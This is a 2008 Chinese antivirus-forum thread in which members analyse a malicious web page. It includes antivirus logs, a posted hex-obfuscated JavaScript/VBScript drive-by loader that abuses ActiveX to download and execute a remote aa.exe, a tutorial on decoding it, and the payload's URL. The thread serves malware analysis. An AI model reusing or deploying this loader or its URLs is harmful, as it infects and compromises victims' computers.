查看: 5300|回复: 21
收起左侧

[已鉴定] 毒网

 关闭 [复制链接]
cy6266812
发表于 2008-1-22 02:25:47 | 显示全部楼层 |阅读模式
毒网

http://www.80diy.com/home/20040814/13/3274041.html







红伞报



xported events:

2008-1-22 2:44 [Guard] Malware found
      Virus or unwanted program 'HEUR/Exploit.HTML [HEUR/Exploit.HTML]'
      detected in file 'C:\Documents and Settings\Administrator\Application
      Data\Opera\Opera\profile\cache4\opr057FG.htm.
      Action performed: Move file to quarantine




随便抓了一个,GIF

[ 本帖最后由 cy6266812 于 2008-1-22 02:53 编辑 ]

新建文件夹.rar

489 Bytes, 下载次数: 145

ALEXBLAIR
发表于 2008-1-22 02:33:36 | 显示全部楼层
ALEXBLAIR
发表于 2008-1-22 02:34:53 | 显示全部楼层
晕倒,要计算的啊。。。。。



  1. function mymid(ss) {
  2. return ss.substring(2);}


  3. s="js"
  4. flag_type=s
  5. S="66756e6374696F6e20676E286E29200D0A7B200D0a766172206E756D626572203d204D6174682e72616E646F6D282"
  6. S=S+"92A6E3B2072657475726E20277E746D70272B4d6174682E726F756e64286e756d626572292b272E657865273B200d"
  7. S=S+"0A7d200D0A6C6A3d22687474703a2F2f7777772E656865683030312e636e2f61612e657865223b0d0A747279200D0"
  8. S=S+"A7B206161613D226f223B0d0a6262623D22626a65223b0d0A7979793D226374223B0D0A6363633d2241646f64223b"
  9. S=S+"0D0A6464643D22622e53747265616D223B0d0a6565653d224D6963726f736f66742E584d4C485454222b2250223B0"
  10. S=S+"d0a6767673d226F223b0d0a6b6B6B3D2270223b0d0A6d6d6d3d2265223B0d0a7373733D226E223B0d0a7661722064"
  11. S=S+"663d646F63756D656e742e637265617465456c656D656E74286161612b6262622b797979293b200d0a64662E73657"
  12. S=S+"44174747269627574652822636c6173736964222c22636c7369643a42443936433535362D363541332d313144302D"
  13. S=S+"393833412d30304330344643323945333622293b200d0A76617220783d64662e4372656174654f626a65637428656"
  14. S=S+"5652C2222293b200d0A76617220533D64662E4372656174654F626a656374286363632B6464642c2222293B200D0a"
  15. S=S+"532E747970653D313b200d0A782e6f70656E2822474554222c206c6A2C30293b0d0a782e73656E6428293B200D0a6"
  16. S=S+"d7a313d676e283130303030293b200D0a76617220463D64662E4372656174654f626a656374282253637269707469"
  17. S=S+"6e672E46696c6553797374656d4F626A656374222c2222293B200d0A76617220746d703D462e47657453706563696"
  18. S=S+"16c466f6c6465722830293B206D7A313D20462e4275696c645061746828746D702C6D7A31293B200d0a532e4F7065"
  19. S=S+"6e28293B0D0a7474743D782E726573706F6e7365426f64793B0d0A532e577269746528747474293B200D0A693d323"
  20. S=S+"B0d0a535B2253617665546F46696C65225D286d7A312c69293B20532e436c6F736528293b200d0A76617220513d64"
  21. S=S+"662e4372656174654f626A65637428225368656C6c2e4170706C69636174696f6E222c2222293b200D0A657870313"
  22. S=S+"D462E4275696c645061746828746d702B275c5C737973272b2774656d3332272C27636D642E65786527293B200D0A"
  23. S=S+"515b225368656c6c45222B22786563757465225d28657870312C27202f6320272B6d7a312c22222c6767672B6b6B6"
  24. S=S+"B2B6D6D6d2B7373732C30293B200d0a7D206361746368286929207b20693d313b207d200D0A"
  25. D=""
  26. DO WHILE LEN(S)>1
  27.     k="&H"
  28.     k=k+ucase(LEFT(S,2))
  29.     p=CLng(k)
  30.     m=chr(p)
  31.     D=D+m
  32.     S=mymid(S)
  33. LOOP
  34. if flag_type="html" then
  35.   document.write(D)
  36. end if
  37. if flag_type="vbs" then
  38.   EXECUTE D
  39. end if


  40. if (flag_type=="js") {
  41. var e;
  42. try
  43. {
  44. eval(D);
  45. }
  46. catch(e){}
  47. }


复制代码
jimmyleo
发表于 2008-1-22 09:55:01 | 显示全部楼层
阿米教学时间到

选取所有s+=的部分
混淆的一种

然后按+=

第二次(注第二次意为转到左边,下同)
按下面的算法其实是ASCII码转换
由于都是生成器弄的 暂时还没有新花样
是属于没有分割符的ASCII码
所以ASCII边上分割符不要填
直接按ASCII

你看到了什么?


nice~


http://www.eheh001.cn/aa.exe[:26:]

评分

参与人数 2经验 +30 收起 理由
ALEXBLAIR + 10 感谢解答啊~~
ykz1991 + 20 你的Freshow为什么一直没人评分:(

查看全部评分

dikex
发表于 2008-1-22 10:15:16 | 显示全部楼层
原帖由 jimmyleo 于 2008-1-22 09:55 发表
阿米教学时间到

选取所有s+=的部分
混淆的一种

然后按+=

第二次(注第二次意为转到左边,下同)
按下面的算法其实是ASCII码转换
由于都是生成器弄的 暂时还没有新花样
是属于没有分割符的ASCII码
所 ...


看来以后不能在毒网方面骗贴了
jimmyleo
发表于 2008-1-22 10:23:11 | 显示全部楼层
e~~~~~~~~~~~~~~~~
谁帮我设计个图标……
宝贝要升天了
发表于 2008-1-22 10:31:14 | 显示全部楼层
原帖由 jimmyleo 于 2008-1-22 10:23 发表
e~~~~~~~~~~~~~~~~
谁帮我设计个图标……


红伞区有你这么一个版主就足够了
应该再招一个高手来做版主助手....哈哈哈
qigang
发表于 2008-1-22 19:38:44 | 显示全部楼层

2/1

瑞星病毒查杀结果报告

清除病毒种类列表:

病毒: Worm.Win32.Agent.zjq     

MAC 地址:00:11:5B:F3:6D:69

用户来源:互联网

软件版本:20.28.11

virus1.rar

32.79 KB, 下载次数: 100

solcroft
发表于 2008-1-22 20:11:03 | 显示全部楼层
原帖由 jimmyleo 于 2008-1-22 11:25 发表
阿米教学时间到

选取所有s+=的部分
混淆的一种

然后按+=

第二次(注第二次意为转到左边,下同)
按下面的算法其实是ASCII码转换
由于都是生成器弄的 暂时还没有新花样
是属于没有分割符的ASCII码
所 ...

其实也只是简单的unescape加密,把代码提取出来,用document.write执行就可以了
不过有工具的确省时间
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-16 17:36 , Processed in 0.139876 second(s), 21 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表